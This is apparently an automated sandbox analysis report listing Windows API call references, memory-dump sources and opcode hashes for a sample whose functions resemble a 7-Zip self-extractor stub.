                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID: %%S/$%%S\
                                                                                                • API String ID: 613200358-358529586
                                                                                                • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                                • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID: %%M/$%%M\
                                                                                                • API String ID: 613200358-4143866494
                                                                                                • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                                • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                                APIs
                                                                                                • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow
                                                                                                • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                                • API String ID: 432778473-803145960
                                                                                                • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                                • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                                APIs
                                                                                                  • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@$??3@$memmove
                                                                                                • String ID: IA$IA$IA
                                                                                                • API String ID: 4294387087-924693538
                                                                                                • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                                • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                                • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                                                • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                                APIs
                                                                                                • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                                • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                • String ID: IA
                                                                                                • API String ID: 3462485524-3293647318
                                                                                                • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                                • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                                • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                                • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                                                • String ID: 0x%p
                                                                                                • API String ID: 2530384128-1745605757
                                                                                                • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                                • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                                APIs
                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$??3@
                                                                                                • String ID: 100%%
                                                                                                • API String ID: 2562992111-568723177
                                                                                                • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                                • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                                APIs
                                                                                                • wsprintfW.USER32 ref: 00407A12
                                                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                                • String ID: (%u%s)
                                                                                                • API String ID: 3595513934-2496177969
                                                                                                • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                                • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                                • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                                                • API String ID: 2574300362-3846845290
                                                                                                • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                                • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                • API String ID: 2574300362-3900151262
                                                                                                • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                                • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                • API String ID: 2574300362-736604160
                                                                                                • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                                • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                  • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1731127917-0
                                                                                                • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                                • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                                APIs
                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                                • wsprintfW.USER32 ref: 00403FFB
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1746483863-0
                                                                                                • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                                • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                                APIs
                                                                                                • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharUpper
                                                                                                • String ID:
                                                                                                • API String ID: 9403516-0
                                                                                                • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                                • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                                APIs
                                                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                                • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
